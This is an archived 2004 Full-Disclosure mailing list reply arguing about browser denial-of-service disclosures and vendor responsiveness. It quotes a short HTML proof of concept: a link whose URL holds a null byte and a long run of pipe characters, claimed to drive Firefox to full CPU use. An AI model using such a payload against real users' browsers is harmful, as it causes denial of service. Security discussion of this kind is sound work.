Re: To anybody who's offended by my disclosure policy-GET THIS GUYS

[James Tucker <jftucker () gmail com>]

I don't have allot to say on this topic as a whole which I have not
said before, so some of this is just repetition; maybe it'll be heard
this time. DoSing browsers will almost always be possible, as with any
other application, so long as you can load it up to process enough
information.

If the developers put range checks on every input the system would
perform very slowly and would not scale up to future hardware
capabilities. For mission critical applications this is fully
necessary but to be quite honest, there isn't a perfect solution
(there's no such thing as functional equivalence when it comes to
software design).

The 'exploit' in question may have some other ramifications than just
processor usage, and if it does then fair enough; but frankly making
something which simply occupies processor time is not hard, and would
be just as easy to do with javascript as with anything else. The most
difficult thing about this is to make the task the correct time that
it will abuse the session managers priority matrix. For more detail on
that see HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager along with any related technical docs.




On Thu, 21 Oct 2004 11:26:14 +0200, Rafel Ivgi, The-Insider
<rivgi () finjan com> wrote:
> SkyLined is a great dude. Scerious guy!

scerious eh?

> He is only worthy for RESPECT and no blame.
> There is no signed law against releasing such information and its funny
> someone is anyhow talking about this in
> FULL-DISCLOSURE list, which its entire concept is to disclose full details
> about vulnerabilities.

what vulnerability?


If your talking about excess use of processor time then you are
currently performing quite a nice PoC in making me feel that this mail
is necessary!

 
> By the way, for all of FireFox fans....FireFox has many open vulnerabilities
> which its vendor refuses to fix. Even after notifing
> and even after 4 month :-)...Moreover, they are just like MS claiming
> certain bugs are not bugs, talking "in the air" and without checking
> and under-blowing risk values. They even don't sign their exe's(which is a
> super minimal protection against man-in-the-middle replacing downloads) so
> microsoft windows can't say its a valid file from a valid vendor and not a
> virus.

You should know though as well as the rest of us that signing
technologies are not perfect, and the man in the middle can stand to
corrupt other data transfer too making signing somewhat pointless in
this scenario.



> For Example:
> <a
> href='http://theinsider.deep-ice.com/ctfmon.exe%00/hehe.exe.||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> ||||||||||||||||||||||||||||||
> '>test it</a>
>
> This has no effect on I.E......
> Will cause LooserFox, ahh sorry, FireFox to ***BURN ALL YOU CPU!!! 100%
> FOREVER...***

Maybe you would find yourself receiving a little more respect if you
showed some to the vendor and didn't call them losers? just an idea,
surely you are good at social engineering too, but you don't seem to
show it.

> What i am saying is, it is now who codes the software, it is how you do.

So time codes software? 
Sorry, I know what you are trying to say, well this is the core of my
point, if SkyLined is such a great bloke why doesn't he get the source
from the CVS and actually send better code back, this is supposed to
be what open source is all about. There is some hypocrisy in here
somewhere which I hope you can find for yourself because I don't want
to start that much of a battle, just please start being reasonable.


> (if i was not in a job working frame, i would publishing things that will
> cause you all to say its shit)

What makes you think that these kinds of 'exploits' are not possible
to be built for any other browser? Why do you consider Firefox worse
than other browsers, in REAL justified terms? I don't want to read RAW
HTML all the time just because there isn't a good piece of software
out there to perform this job, I make an informed decision as to which
one is going to serve my purpose best and I use that. I wish that all
software could be perfect, but I have my eyers open to reality that
this will not always be the case.

> FireFox team claimed its an old bug.bla bla bla.and has no problem and no
> security risk...bla bla bla... and didn't fix it after 4 month...

Once again, if its so easy to fix, why haven't one of you geni done it yet?

> Just like MS when they are not even commercial, than what they are? on the
> way to making money...to be the second size'd market share browser.

So the top two browsers in the world both have major security
implications to their users, maybe this would suggest something to you
about how easy it is to develop such a piece of software so that it
works with most pages and will satisfy most customers. Do you really
think that all these coders are so bad? Are you trying to suggest that
when you code you never have to debug and it always comes out
mathematically optimal? if so then why don't you go and pay someone to
fix it with your vast capitol that you should be earning for your
skills?  After all you are the one who claims your only doing it to
better the world for mankind.

> GO SKYLINED!

If you really want people to consider you to be useful then try to
actually fix what you break, other wise you have to realise that your
actions are only destructive. In the case of Internet Explorer you
don't get that option, but your attitude toward Firefox is a little
strange at best.



> Rafel Ivgi, The-Insider
> Security Consultant
> Malicious Code Research Center (MCRC)
> Finjan Software LTD
> E-mail: rivgi () Finjan com
> ---------------------------------
> Prevention is the best cure!

I suggest you listen to your own footer!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html